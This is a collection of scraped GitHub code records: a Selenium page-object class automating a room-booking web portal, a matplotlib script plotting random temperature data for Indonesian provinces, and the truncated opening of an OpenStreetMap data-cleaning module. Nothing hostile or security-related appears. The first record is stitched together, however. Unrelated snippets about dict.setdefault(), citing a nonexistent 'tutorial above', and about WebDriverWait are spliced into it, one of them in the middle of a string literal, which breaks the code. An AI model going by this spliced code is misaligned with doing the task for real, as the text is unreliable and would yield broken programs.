+{"seq_id":"1469709286","text":"import traceback\nfrom Pages.BasePage import BasePage\nfrom WebConfig.web_config import TestData\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.keys import Keys\nfrom time import sleep\n\n\nclass RoomBookingsPage(BasePage):\n\n    # <======================================== Selectors ========================================>\n    # Body Xpath\n    BODY = (By.CSS_SELECTOR, \"body\")\n\n    # Room No -------\n    ROOM_NO = 124\n    ROOM_NUMBER = (\n        By.XPATH, \"//*[@id='meeting-room-room-modal-dialog-box']/div/div[2]/div/div/div[1]/div/div[5]/div[3]\")\n    # ROOM_AVAIL = (By.XPATH, \"//div[text()='Available']/parent::*/parent::*/following-sibling::*[4]/button\")\n    ROOM_AVAIL = \"(//div[text()='Available']/parent::*/parent::*/following-sibling::*[4]/button)\"\n    ROOM_AVAIL_NAME = \"(//div[text()='Available']/parent::*/parent::*/following-sibling::*[4]/button)\"\n\n    # ---------------\n    # BOOKING_NAV = (By.XPATH, \"//h3[text()='Booking']\")\n    BOOKING_NAV = (\n        By.XPATH, \"//*[@id='navigation']/div/div/div/div[2]/child::*[3]\")\n    BOOK_SPACE_NAV = (By.XPATH, \"//*[contains(text(), 'Book space')]\")\n    LOCATION_DROPDOWN = (\n        By.XPATH, \"//*[@id='meeting-room']/div[2]/div/div[4]/div/div[1]/div/div[1]/div[1]/div/div\")\n    GENPACT_IT_PARK = (\n        By.XPATH, \"//div[contains(text(), 'Genpact IT Park')]/parent::*/parent::*/parent::*/preceding-sibling::*[2]/span/child::*\")\n    BUSINESS_TOWER = (By.XPATH, \"//div[contains(text(), 'Bussiness Tower')]\")\n    FREE_CLICK = (\n        By.XPATH, \"//*[@id='meeting-room']/div[2]/div/div[4]/div/div[1]/div/div[1]/div[3]/div/div[1]/p\")\n    FIRST_FLOOR = (By.ID, \"0-floor\")\n    STATUS_DROPDOWN = (\n        By.XPATH, \"//*[@id='meeting-room']/div[2]/div/div[4]/div/div[1]/div/div[3]/div[1]/div/div\")\n    AVAILABLE_STATUS = (By.CSS_SELECTOR, \"span[title='Available']\")\n    BOOKED_STATUS = (By.CSS_SELECTOR, \"span[title='Booked']\")\n    ASSIGNED_STATUS = (By.CSS_SELECTOR, \"span[title='Assigned']\")\n    INACTIVE_STATUS = (By.CSS_SELECTOR, \"span[title='Inactive']\")\n    ALL_STATUS = (By.CSS_SELECTOR, \"span[title='All']\")\n    LIST_VIEW_BUTTON = (\n        By.XPATH, \"//*[@id='meeting-room']/div[2]/div/div[4]/div/div[1]/div/div[1]/div[3]/div/div[2]/div/div[2]\")\n\n    RESOURCE_DROPDOWN = (\n        By.XPATH, \"//*[@id='meeting-room']/div[2]/div/div[4]/div/div[1]/div/div[1]/div[3]/div/div[1]/div/div/div\")\n    RESOURCE_ROOM = (By.CSS_SELECTOR, \"span[title='Rooms']\")\n    # Room\n    ROOM_124 = \"//*[@title='{}']/parent::*/parent::*/following-sibling::*[5]/button\"\n\n    # Modal selectors\n    BOOKING_AGENDA = (\n        By.XPATH, \"//*[@id='meeting-room-room-modal-dialog-box']/div/div[2]/div/div/div[2]/div/div[2]/div[2]/input\")\n    ATTENDEE_DETAILS = (\n        By.XPATH, \"//*[@id='meeting-room-room-modal-dialog-box']/div/div[2]/div/div/div[2]/div/div[4]/div/div[2]/div/div/div[1]\")\n    CONFIRM_BOOKING = (\n        By.XPATH, \"//*[@id='meeting-room-room-modal-dialog-box']/div/div[2]/div/div/div[2]/div/div[6]/button[2]\")\n    EDIT_DETAILS = (\n        By.XPATH, \"//*[@id='meeting-room-room-modal-dialog-box']/div/div[2]/div/div/div[1]/div/div[7]/div[2]/p\")\n    EDIT_DETAILS_SEARCH_BOX = (\n        By.XPATH, 
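# --- Small supplementary example of setdefault() with an explicit default,
# complementing the tutorial above (the inventory dict is hypothetical).
inventory = {"apples": 3}
print(inventory.setdefault("apples", 0))   # 3  - key exists, dict unchanged
print(inventory.setdefault("pears", 0))    # 0  - key inserted with the default
print(inventory)                           # {'apples': 3, 'pears': 0}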
\"//*[@id='meeting-room-room-modal-dialog-box']/div/div[2]/div/div/div[1]/div/div[8]/div[1]/div\")\n START_DATE = (\n By.XPATH, \"//*[@id='meeting-room-room-modal-dialog-box']/div/div[2]/div/div/div[1]/div/div[4]/div[1]/div[1]/div[1]/div[2]/div/input\")\n START_DATE_X = (\n By.XPATH, \"//*[@id='meeting-room-room-modal-dialog-box']/div/div[2]/div/div/div[1]/div/div[4]/div[1]/div[1]/div[3]/div[2]/div/span/span\")\n END_DATE = (\n By.XPATH, \"//*[@id='meeting-room-room-modal-dialog-box']/div/div[2]/div/div/div[1]/div/div[4]/div[1]/div[1]/div[3]/div[2]/div/input\")\n CONTACT_EMAIL = (\n By.XPATH, \"//*[contains(text(), 'New Member')]/parent::*/child::*/following-sibling::*/input\")\n CONTACT_RIGHT_TICK = (\n By.XPATH, \"//*[contains(text(), 'New Member')]/parent::*/child::*[4]/div\")\n BOOKING_CONFIRM_BUTTON = (\n By.XPATH, \"//*[contains(text(), 'Confirm Booking')]\")\n LAST_DATE_VALIDITY = (\n By.XPATH, \"//*[@id='meeting-room-room-modal-dialog-box']/div/div[2]/div/div/div[1]/div/div[4]/div[2]/div[2]/div/div[2]/div/div/div/input\")\n\n # BOOKING_MODAL_GO_BACK = (By.XPATH, \"//span[contains(text(),'Go Back')]\")\n BOOKING_MODAL_GO_BACK = (By.XPATH, \"//div/button[1]\")\n # BOOKING_MODAL_GO_BACK = (\n # By.XPATH, \"//*[@id='meeting-room-room-modal-dialog-box']/div/div[1]/div/child::*\")\n\n # After Booking\n ROOM_124_AFTER_BOOKING_TITLE = \"//div[@title='{}']\"\n ROOM_124_RPAGE_STATUS_CHECK = \"//*[@title='{}']/parent::*/parent::td/following-sibling::*[1]/div/div\"\n\n # Resource Details\n RD_CALENDER_INPUT = (\n By.XPATH, \"//*[@id='resource-details-content']/div[1]/div[1]/div/div/div[5]/div/div/div[2]/div[1]/div/div[2]/div/div/input\")\n SCHEDULE_LISTING = (\n By.XPATH, \"//*[@id='resource-details-content']/div[1]/div[1]/div/div/div[5]/div/div/div[3]/div/div/div[2]\")\n I_BUTTON = (By.XPATH, \"//*[@class='rbc-event-content']/span\")\n I_INFO = (By.CLASS_NAME, \"ant-popover-content\")\n I_INFO2 = (By.XPATH, \"/html/body/div[7]/div/div/div\")\n RD_TIME_CHECK = (By.CLASS_NAME, \"rbc-event-label\")\n BOOK_THIS_SPACE = (\n By.XPATH, \"//*[@id='resource-details-content']/div[1]/div[1]/div/div/div[5]/div/div/div[4]/div/button\")\n BOOKING_HOSTNAME = (\n By.XPATH, \"/html/body/div[7]/div/div/div/div[2]/div[2]/div[1]/div[1]\")\n BOOKING_HOSTEMAIL = (\n By.XPATH, \"/html/body/div[7]/div/div/div/div[2]/div[2]/div[1]/div[2]\")\n BOOKING_START = (\n By.XPATH, \"/html/body/div[7]/div/div/div/div[2]/div[2]/div[1]/div[3]\")\n BOOKING_END = (\n By.XPATH, \"/html/body/div[7]/div/div/div/div[2]/div[2]/div[1]/div[4]\")\n\n # My Bookings\n MY_BOOKING_NAV = (By.XPATH, \"//*[@id='sub-nav']/div[2]\")\n ROOM_124_CHECK_DIV = \"(//p[text()='{}']/parent::*/parent::div)\"\n ROOM_124_CHECK_DIV_LAST = \"(//p[text()='{}']/parent::*/parent::div)[last()]\"\n ROOM_124_SCHEDULE_CHECK = \"//p[text()='{}']/parent::*/following-sibling::*[1]\"\n ROOM_124_MEETING_OPTIONS_BUTTONS_CHECK = \"(//p[text()='{}']/parent::*/following-sibling::*[2])\"\n ROOM_124_MEETING_OPTIONS_CANCEL_BUTTON = \"(//p[text()='{}']/parent::*/following-sibling::*[2]/div/div/button[2])\"\n ROOM_124_MEETING_OPTIONS_CANCEL_BUTTON_LAST = \"(//p[text()='{}']/parent::*/following-sibling::*[2]/div/div/button[2])[last()]\"\n ROOM_124_MEETING_OPTIONS_FOLLOWING_CANCEL_BUTTON = \"(//p[text()='{}']/parent::*/following-sibling::*[2]/div/button)\"\n MAIN_CARDS_CONATINER = (By.ID, \"mainBookingCardsContainer\")\n ROOM_124_MEETING_OPTIONS_CANCEL_ALL_DOTS = \"//p[text()='{}']/parent::*/parent::*/preceding-sibling::*/child::*[2]/child::*/child::*/*[@class='MuiSvgIcon-root']\"\n 
ROOM_124_MEETING_OPTIONS_CANCEL_ALL_BUTTON = (\n By.XPATH, \"//*[text()='Cancel All']\")\n LAST_DATE_INPUT = (\n By.XPATH, \"//*[@id='meeting-room']/div[2]/div/div[4]/div[1]/div/div[1]/div/div/div[2]/div[1]/div/div[3]/input\")\n FREE_CLICK_MB = (\n By.XPATH, \"//*[@id='meeting-room']/div[2]/div/div[4]/div[2]/div[1]/div/div[1]\")\n MAIN_CARDS_CONTAINER = (By.XPATH, \"//*[@id='mainBookingCardsContainer']\")\n REFRESH_BOOKINGS = (By.XPATH, \"//*[@class='ant-tooltip-open']\")\n MY_SHORTCUTS_H3 = (By.XPATH, \"//h3[text()='My Shortcut']\")\n\n # Overlapping error\n GEN_ERROR_MSG = (By.XPATH, \"//*[contains(text(), 'Booking Error:')]\")\n BK_OVERLAPPING_ERROR_MSG = (\n By.XPATH, \"//span[contains(text(), 'Booking Error: Booking Exists')]\")\n BK_OVERLAPPING_ERROR_MSG_1 = (\n By.XPATH, \"//*[contains(text(), 'Error in extending Booking')]\")\n BK_OVERLAPPING_ERROR_MSG_2 = (\n By.XPATH, \"//*[contains(text(), 'Error in extending Booking')]\")\n\n # Recurring\n ROOM_124_CHECK_RDIV = \"(//p[text()='{}']/parent::*/following-sibling::*/div[2]/div/p/span[contains(text(),'every day')])\"\n ROOM_124_RDIV_CANCEL_BUTTON = \"//p[text()='{}']/parent::*/following-sibling::*/div[2]/div/p/span[contains(text(),'every day')]/parent::*/parent::*/parent::*/parent::*/following-sibling::*/div/div/button[2]\"\n REPEAT_DROPDOWN = (\n By.XPATH, \"//*[@id='meeting-room-room-modal-dialog-box']/div/div[2]/div/div/div[1]/div/div[4]/div[2]/div[1]/div/div/div/div[1]\")\n REPEAT_DAILY = (By.XPATH, \"//*[contains(text(), 'Daily')]\")\n REPEAT_WEEKLY = (By.XPATH, \"//*[contains(text(), 'Weekly')]\")\n REPEAT_TILL_DATE = (\n By.XPATH, \"//*[contains(text(), 'Ending (on Date)')]/following-sibling::*/child::*/child::*\")\n REPEAT_FREQUENCY = (By.XPATH, \"//*[contains(text(), 'Every')]/child::*\")\n MULTIPLE_DAYS = (By.XPATH, \"//*[contains(text(), 'Daily')]\")\n MULTIPLE_DAYS_START_DATE = (\n By.XPATH, \"//*[@id='meeting-room']/div[2]/div/div[4]/div/div[1]/div/div[1]/div[2]/div/div/div/div[2]/div/div[1]/input\")\n MULTIPLE_DAYS_END_DATE = (\n By.XPATH, \"//*[@id='meeting-room']/div[2]/div/div[4]/div/div[1]/div/div[1]/div[2]/div/div/div/div[2]/div/div[3]/input\")\n\n # Extend Booking\n PRE_EXTEND_TIME = \"//p[text()='{}']/parent::*/following-sibling::*[1]/div/div\"\n CHECKIN_BOOKING = \"//p[text()='{}']/parent::*/following-sibling::*[2]/div/div/button[1]\"\n EXTEND_BOOKING = \"//p[text()='{}']/parent::*/following-sibling::*[2]/div/div/button[2]\"\n EXTEND_15_MINS = (By.CSS_SELECTOR, \"p[text()='15 minutes']\")\n EXTEND_30_MINS = (By.CSS_SELECTOR, \"p[text()='30 minutes']\")\n EXTEND_45_MINS = (By.CSS_SELECTOR, \"p[text()='45 minutes']\")\n EXTEND_60_MINS = (By.CSS_SELECTOR, \"p[text()='60 minutes']\")\n EXTEND_BOOKING_TEXT_CONFIRM = \"//p[text()='{}']/parent::*/parent::*/following-sibling::div[2]/div\"\n\n # Logout\n LOGOUT_DROPDOWN = (\n By.XPATH, \"//*[@id='navigation']/div/div/div/div[3]/div/div[2]/div/div[2]/div\")\n LOGOUT_BUTTON = (By.XPATH, \"//*[text()='Logout']\")\n\n # Tags\n TAG_DROPDOWN = (\n By.XPATH, \"//*[@id='meeting-room']/div[2]/div/div[4]/div/div[1]/div/div[3]/div[2]/div/div\")\n TAG_SELECT = (\n By.XPATH, f\"//*[@title='{TestData.TAG}']/preceding-sibling::*[1]\")\n\n # Pagination Check\n ROOOMS_CLOSE = (\n By.XPATH, \"//span[@title='Rooms']/child::*[2]/child::*/child::*\")\n TOTAL_ITEMS = (By.XPATH, \"//*[@class='ant-pagination-total-text'][last()]\")\n PAGE_PREV = (\n By.XPATH, \"//*[@class='ant-pagination-total-text']/following-sibling::*[1]\")\n PAGES_NUMBERING = 
\"//*[@class='ant-pagination-total-text']/following-sibling::*[{}]\"\n FIRST_PAGE_LI = (\n By.XPATH, \"//*[@class='ant-pagination-total-text']/following-sibling::*[2]\")\n NEXT_PREV = (\n By.XPATH, \"//*[@class='ant-pagination-total-text']/following-sibling::*[last()]/*/parent::*/preceding-sibling::*[1]\")\n LAST_PAGE_LI = (\n By.XPATH, \"//*[@class='ant-pagination-total-text']/following-sibling::*[last()]/*/parent::*/preceding-sibling::*[2]\")\n\n NUM_OF_TR = (By.XPATH, \"//tbody/tr\")\n\n VRS_LOADER = (By.XPATH, \"//*[@class='vrs-loader-logo']/child::*\")\n\n\n # Book Space Date Selectors\n BS_DATE_DIV = (By.XPATH, \"//input[@placeholder='Today']\")\n BS_DMULTIPLE_DAYS = (By.XPATH, \"//p[text()='Multiple Days']\")\n BS_DENDDATE = (By.XPATH, \"//input[@placeholder='End date']\")\n BS_DONE = (By.XPATH, \"//button/span[text()='Done']\")\n TDATA_ENDDATE = (By.XPATH, f\"//*[@title='{TestData.BS_CAL_ENDDATE}']\")\n CAL_NEXT_MONTH = (By.CLASS_NAME, \"ant-picker-next-icon\")\n CAL_OK_BUTTON = (By.XPATH, \"//button/span[text()='Ok']\")\n\n # <===================================== Functions =======================================>\n\n \"\"\"constructor of the page class\"\"\"\n\n def __init__(self, driver):\n super().__init__(driver)\n\n \"\"\"Page actions for Bookings Page\"\"\"\n\n \"\"\"selecting location\"\"\"\n\n def select_location(self):\n sleep(5)\n try:\n self.action_chain_click(self.LOCATION_DROPDOWN)\n sleep(2)\n self.action_chain_click(self.GENPACT_IT_PARK)\n sleep(2)\n self.action_chain_click(self.BUSINESS_TOWER)\n sleep(2)\n self.do_click(self.FREE_CLICK)\n assert \"Location selection passed\"\n except Exception as e:\n print(\"Select_location_room exception: \", e)\n # sleep(5)\n\n def select_resource_type(self):\n try:\n self.do_click(self.RESOURCE_DROPDOWN)\n sleep(1)\n self.do_click(self.RESOURCE_ROOM)\n self.do_click(self.FREE_CLICK)\n sleep(1)\n except Exception as e:\n print(\"select_resource_type exception: \", e)\n\n def select_floor(self):\n try:\n self.do_click(self.FIRST_FLOOR)\n sleep(1)\n assert \"Floor selection done\"\n except Exception as e:\n print(\"select_floor exception: \", e)\n\n def select_available_status(self):\n try:\n self.action_chain_click(self.STATUS_DROPDOWN)\n sleep(2)\n self.action_chain_click(self.AVAILABLE_STATUS)\n sleep(2)\n assert \"Select Available status done\"\n except Exception as e:\n print(f\"select_available_status exception: e \\n{traceback.format_exc()}\")\n self.take_screenshot(f\"select_available_status/Ex_{TestData.CDATE[:10]}/{TestData.CDATE[1:]}.png\")\n\n def select_available_resource(self, a=None):\n # self.do_click(self.ROOM_AVAIL)\n for i in range(1, 6):\n title = self.get_element_text_by_xpath(\n self.ROOM_AVAIL_NAME+str([i]))\n if title not in TestData.ROOM_W_ISSUE:\n if a is None:\n print(\"Booking: \", self.ROOM_AVAIL+str([i]))\n self.do_click_by_xpath(self.ROOM_AVAIL+str([i]))\n else:\n self.do_click_by_xpath(self.ROOM_AVAIL_NAME+str([a]))\n break\n else:\n pass\n\n def select_days_end(self):\n try:\n self.do_click(self.BS_DATE_DIV)\n self.action_chain_click(self.BS_DMULTIPLE_DAYS)\n self.action_chain_click(self.BS_DENDDATE)\n print(f\"End date: {self.TDATA_ENDDATE}\")\n for i in range(2):\n d_isvisible = self.is_visible(self.TDATA_ENDDATE)\n print(f\"{i}. 
visibility: {d_isvisible}\")\n if d_isvisible == True:\n self.do_click(self.TDATA_ENDDATE)\n break\n else:\n self.do_click(self.CAL_NEXT_MONTH)\n self.action_chain_click(self.CAL_OK_BUTTON)\n sleep(1)\n self.action_chain_click(self.BS_DONE)\n sleep(4)\n except Exception as e:\n print(f\"select_days_end exception: {e}\")\n\n def select_tag(self):\n try:\n self.do_click(self.TAG_DROPDOWN)\n sleep(3)\n self.do_click(self.TAG_SELECT)\n sleep(3)\n self.do_click(self.FREE_CLICK)\n sleep(2)\n except Exception as e:\n print(\"select_tag exception: \", e)\n\n def confirm_booking(self):\n self.do_click(RoomBookingsPage.BOOKING_CONFIRM_BUTTON)\n enabled_check = self.is_enabled(\n self.GEN_ERROR_MSG)\n print(\"enabled_check: \", enabled_check)\n if enabled_check == 1:\n error_msg = self.get_element_text(\n self.GEN_ERROR_MSG)\n print(\"error-msg: \", error_msg)\n sleep(6)\n enabled_check_1 = self.is_enabled(\n self.BOOKING_MODAL_GO_BACK)\n print(\"enabled_check1: \", enabled_check_1)\n self.do_click(self.BOOKING_MODAL_GO_BACK)\n sleep(2)\n else:\n pass\n\n def get_room_name(self):\n try:\n rval = self.get_element_text(self.ROOM_NUMBER)\n print(\"rval: \", rval)\n return rval\n except Exception as e:\n print(\"get_room_name exception: \", e)\n\n def select_booked_status(self):\n sleep(3)\n try:\n self.action_chain_click(self.STATUS_DROPDOWN)\n sleep(2)\n self.action_chain_click(self.BOOKED_STATUS)\n sleep(2)\n assert \"Select Booked status done\"\n except Exception as e:\n print(f\"select_booked_status exception: e \\n{traceback.format_exc()}\")\n self.take_screenshot(f\"select_booked_status/Ex_{TestData.CDATE[:10]}/{TestData.CDATE[1:]}.png\")\n\n def select_all_status(self):\n sleep(5)\n try:\n self.action_chain_click(self.STATUS_DROPDOWN)\n sleep(2)\n self.action_chain_click(self.ALL_STATUS)\n sleep(2)\n assert \"Select All status done\"\n except Exception as e:\n print(f\"select_all_status exception: e \\n{traceback.format_exc()}\")\n self.take_screenshot(f\"select_all_status/Ex_{TestData.CDATE[:10]}/{TestData.CDATE[1:]}.png\")\n\n def enter_agenda(self):\n try:\n self.host_selection(self.BOOKING_AGENDA, TestData.ROOM_AGENDA)\n except Exception as e:\n print(\"Agenda error exception: \", e)\n\n def new_contact_guest(self, contact_name, contact_email):\n try:\n self.host_selection(self.ATTENDEE_DETAILS, contact_name)\n self.do_send_keys(self.CONTACT_EMAIL, contact_email)\n self.do_click(self.CONTACT_RIGHT_TICK)\n sleep(2)\n except Exception as e:\n print(\"new_contact_guest exception: \", e)\n\n def enter_datetime(self):\n try:\n # self.do_click(self.START_DATE)\n # self.action_chain_click(self.START_DATE_X)\n self.date_selection_chain(\n self.START_DATE, TestData.ROOM_START_DATE, 18)\n # self.do_click(self.END_DATE)\n self.date_selection_chain(\n self.END_DATE, TestData.ROOM_END_DATE, 18)\n except Exception as e:\n print(\"enter_datetime exception: \", e)\n\n def enter_datetime_weekly(self):\n try:\n self.do_click(self.START_DATE)\n self.action_chain_click(self.START_DATE_X)\n self.date_selection_chain(\n self.START_DATE, TestData.ROOM_WSTART_DATE, 18)\n self.do_click(self.END_DATE)\n self.date_selection_chain(\n self.END_DATE, TestData.ROOM_WEND_DATE, 18)\n except Exception as e:\n print(\"enter_datetime exception: \", e)\n\n def resource_page_booking_check(self):\n try:\n rpage_status = self.get_element_text_by_xpath(\n self.ROOM_124_RPAGE_STATUS_CHECK)\n assert rpage_status == \"Booked\"\n print(\"rpage_status passed as: \", rpage_status)\n print(\"At the find resource page, status of booking 
should be changed from available to booked for the booked time frame: Passed\")\n except Exception as e:\n print(\"resource_page_booking_check exception: \", e)\n self.take_screenshot(f\"resource_page_booking_check/Ex_{TestData.CDATE[:10]}/{TestData.CDATE[1:]}.png\")\n\n def resource_details_page_check(self):\n self.scroll_to_element(self.SCHEDULE_LISTING)\n sleep(2)\n try:\n self.do_click(self.I_BUTTON)\n sleep(3)\n eltext = self.get_element_text(self.I_INFO).split('\\n')\n print(\"eltext: \", eltext)\n sleep(3)\n print(\"At the resource details page, booking should be available: Passed\")\n except Exception as e:\n print(\"I_button exce: \", e)\n self.take_screenshot(f\"resource_details_page_check/Ex_{TestData.CDATE[:10]}/{TestData.CDATE[1:]}.png\")\n self.do_send_keys(self.BODY, Keys.PAGE_UP)\n\n def check_my_booking(self):\n try:\n self.do_click(self.MY_BOOKING_NAV)\n sleep(3)\n self.scroll_to_element_by_xpath(self.ROOM_124_CHECK_DIV)\n sleep(3)\n # Meeting Options\n meeting_options = self.get_element_text_by_xpath(\n self.ROOM_124_MEETING_OPTIONS_BUTTONS_CHECK).split('\\n')\n std_meeting_options = ['Check in', '', 'Cancel Booking']\n assert meeting_options == std_meeting_options\n print(\"In My booking page, the created booking should be visible with two options i.e Check In and Cancel booking: Passed\")\n self.do_click_by_xpath(self.ROOM_124_CHECK_DIV)\n sleep(3)\n except Exception as e:\n print(\"check_my_roombooking exception: \", e)\n\n def daily_repeat(self):\n try:\n self.do_click(self.REPEAT_DROPDOWN)\n sleep(3)\n self.do_click(self.REPEAT_DAILY)\n sleep(2)\n # self.date_selection_chain(self.REPEAT_FREQUENCY, TestData.REPEAT_FREQUENCY, 2)\n sleep(2)\n self.date_selection_chain(\n self.REPEAT_TILL_DATE, TestData.REPEAT_TILL_DATE[:11], 2)\n except Exception as e:\n print(\"daily_repeat exception: \", e)\n\n def daily_repeat2(self):\n try:\n self.do_click(self.REPEAT_DROPDOWN)\n sleep(3)\n self.do_click(self.REPEAT_DAILY)\n sleep(2)\n # self.date_selection_chain(self.REPEAT_FREQUENCY, TestData.REPEAT_FREQUENCY, 2)\n sleep(2)\n self.date_selection_chain(\n self.REPEAT_TILL_DATE, TestData.REPEAT_TILL_DATE3, 2)\n except Exception as e:\n print(\"daily_repeat2 exception: \", e)\n\n def weekly_repeat(self):\n try:\n self.do_click(self.REPEAT_DROPDOWN)\n sleep(3)\n self.do_click(self.REPEAT_WEEKLY)\n sleep(2)\n self.date_selection_chain(\n self.REPEAT_TILL_DATE, TestData.WEEKLY_REPEAT_TILL_DATE, 2)\n sleep(2)\n # self.date_selection_chain(self.REPEAT_FREQUENCY, TestData.REPEAT_FREQUENCY, 2)\n except Exception as e:\n print(\"weekly_repeat exception: \", e)\n\n def cancel_booking(self):\n try:\n self.scroll_to_element_by_xpath(self.ROOM_124_CHECK_DIV)\n sleep(3)\n # Meeting Options\n meeting_options = self.get_element_text_by_xpath(\n self.ROOM_124_MEETING_OPTIONS_BUTTONS_CHECK).split('\\n')\n std_meeting_options = ['Check in', '', 'Cancel Booking']\n # assert meeting_options == std_meeting_options\n print(\"In My booking page, the created booking should be visible with two options i.e Check In and Cancel booking: Passed\")\n self.do_click_by_xpath(self.ROOM_124_MEETING_OPTIONS_CANCEL_BUTTON)\n sleep(4)\n self.do_click(self.MY_SHORTCUTS_H3)\n self.action_chain_sendkeys_1(self.BODY, Keys.HOME)\n self.do_click(self.REFRESH_BOOKINGS)\n except Exception as e:\n print(\"cancel_booking exception: \", e)\n\n def cancel_last_booking(self):\n try:\n self.scroll_to_element_by_xpath(self.ROOM_124_CHECK_DIV_LAST)\n sleep(3)\n print(\"In My booking page, the created booking should be visible with two 
options i.e Cancel booking: Passed\")\n self.do_click_by_xpath(\n self.ROOM_124_MEETING_OPTIONS_CANCEL_BUTTON_LAST)\n sleep(20)\n except Exception as e:\n print(\"cancel_last_booking exception: \", e)\n\n def change_date_format(self, string):\n string1 = f'{string[3:6]} {string[:2]} {string[7:11]}'\n return string1\n\n def cancel_some_bookings(self, crange):\n try:\n for i in range(1, crange):\n sleep(2)\n a = 1\n print(\n f\"i: {i} \\n xpath: {self.ROOM_124_MEETING_OPTIONS_FOLLOWING_CANCEL_BUTTON+str([a])}\")\n self.scroll_to_element_by_xpath(\n f'{self.ROOM_124_CHECK_DIV+str([a])}')\n sleep(3)\n # Meeting Options\n meeting_options = self.get_element_text_by_xpath(\n self.ROOM_124_MEETING_OPTIONS_BUTTONS_CHECK+str([a])).split('\\n')\n std_meeting_options = ['Check in', '', 'Cancel Booking']\n # assert meeting_options == std_meeting_options\n print(\"In My booking page, the created booking should be visible with two options i.e Check In and Cancel booking: Passed\")\n if i == 1:\n print(\"in i=1\")\n self.scroll_to_element_by_xpath(\n self.ROOM_124_MEETING_OPTIONS_CANCEL_BUTTON)\n self.do_click_by_xpath(\n self.ROOM_124_MEETING_OPTIONS_CANCEL_BUTTON)\n else:\n print(\"in i!=1\")\n self.scroll_to_element_to_mid_by_xpath(\n f'{self.ROOM_124_MEETING_OPTIONS_FOLLOWING_CANCEL_BUTTON+str([a])}')\n self.do_click_by_xpath(\n f'{self.ROOM_124_MEETING_OPTIONS_FOLLOWING_CANCEL_BUTTON+str([a])}')\n sleep(4)\n ele = self.is_visible(self.VRS_LOADER)\n print(\"vrs loadr: \", ele)\n # while True:\n # if ele == True:\n # sleep(2)\n # else:\n # break\n self.do_click(self.MY_SHORTCUTS_H3)\n self.action_chain_sendkeys_1(self.BODY, Keys.HOME)\n self.do_click(self.REFRESH_BOOKINGS)\n except Exception as e:\n print(\"cancel_some_bookings exception: \", e)\n\n def extend_booking(self, etime):\n try:\n pre_extend_time = self.get_element_text_by_xpath(\n self.PRE_EXTEND_TIME)\n print(\"pre_extend_time: \", pre_extend_time)\n self.do_click_by_xpath(self.CHECKIN_BOOKING)\n sleep(12)\n self.do_click_by_xpath(self.EXTEND_BOOKING)\n sleep(5)\n self.do_click(etime)\n sleep(12)\n textend_confirm = self.get_element_text_by_xpath(\n self.EXTEND_BOOKING_TEXT_CONFIRM)\n print(\"text: \", textend_confirm)\n assert textend_confirm == \"In Use, Booking Extended\"\n post_extend_time = self.get_element_text_by_xpath(\n self.PRE_EXTEND_TIME)\n print(\"post_extend_time: \", post_extend_time)\n assert pre_extend_time != post_extend_time\n except Exception as e:\n print(\"extend_booking exception: \", e)\n\n def do_logout(self):\n try:\n self.do_click(self.LOGOUT_DROPDOWN)\n sleep(2)\n self.do_click(self.LOGOUT_BUTTON)\n except Exception as e:\n print(\"do_logout exception: \", e)\n\n def start_selection(self):\n try:\n sleep(1)\n print(\"Selecting Location\")\n self.select_location()\n print(\"Selecting Floor\")\n self.select_floor()\n # Checking available resources\n self.select_available_status()\n # Selecting resource type\n self.select_resource_type()\n # Clicking on list view\n self.do_click(self.LIST_VIEW_BUTTON)\n sleep(3)\n except Exception as e:\n print(f\"start_selection exception: e \\n{traceback.format_exc()}\")\n self.take_screenshot(f\"start_selection/Ex_{TestData.CDATE[:10]}/{TestData.CDATE[1:]}.png\")\n\n #\n","repo_name":"veris-vivekanand/PortalAutomation_v1","sub_path":"Pages/RoomBookingPage.py","file_name":"RoomBookingPage.py","file_ext":"py","file_size_in_byte":27424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32442622144","text":"#!/usr/bin/env 
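# --- Illustrative alternative to the fixed sleep() calls in the page object
# above, using Selenium's standard explicit-wait API (the locator shown is
# hypothetical).
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC

def click_when_ready(driver, locator, timeout=10):
    # poll until the element is clickable instead of sleeping a fixed time
    WebDriverWait(driver, timeout).until(
        EC.element_to_be_clickable(locator)).click()

# click_when_ready(driver, (By.XPATH, "//*[contains(text(), 'Confirm Booking')]"))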
python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 28 05:19:43 2023\n\n@author: ryanadhitama\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nnp.random.seed(0)  # for reproducible results\nn_data = 1000\n\ndki_jakarta = np.random.normal(30, 5, n_data)\njawa_barat = np.random.normal(28, 4, n_data)\njawa_tengah = np.random.normal(32, 6, n_data)\njawa_timur = np.random.normal(27, 3, n_data)\nbanten = np.random.normal(31, 5, n_data)\nyogyakarta = np.random.normal(29, 4, n_data)\nbali = np.random.normal(33, 6, n_data)\n\n# Line plot\nplt.figure(figsize=(12, 6))\nplt.plot(dki_jakarta, label='DKI Jakarta')\nplt.plot(jawa_barat, label='Jawa Barat')\nplt.plot(jawa_tengah, label='Jawa Tengah')\nplt.plot(jawa_timur, label='Jawa Timur')\nplt.plot(banten, label='Banten')\nplt.plot(yogyakarta, label='Yogyakarta')\nplt.plot(bali, label='Bali')\n\nplt.xlabel('Data point')\nplt.ylabel('Temperature (°C)')\nplt.title('Line Plot of Temperatures in Seven Provinces')\nplt.legend()\nplt.grid(True)\nplt.show()\n","repo_name":"ryanadhitama/lineplot-boxplot-matplotlib","sub_path":"lineplot.py","file_name":"lineplot.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
+{"seq_id":"34934530636","text":"\"\"\"File to read an Open Street Map xml file and clean it.\n\nThis module has code to clean a .osm file and turn it into a json file. The\nfunctions can be used individually or the function process_map can take in a\n.osm file and return a cleaned .json file.\n\n\nAttributes:\n    PROBLEMCHARS (regex): Compiled regular expression to determine if there\n        are any characters that would not work or be problematic when\n        trying to structure the data.\n    CITY_NAMES (list): List of acceptable city names for a node/way to be in.\n    CREATED (list): List of strings that correspond to information in an XML\n        element's attribute section about who added the data.\n    POSTCODES (list): List of acceptable Minneapolis post codes.\n    STREET_TYPES (dict): Dictionary to transform non-normal street endings to\n        more standardized endings.\n\"\"\"\nimport xml.etree.cElementTree as ET\nimport re\nimport codecs\nimport json\n\nPROBLEMCHARS = 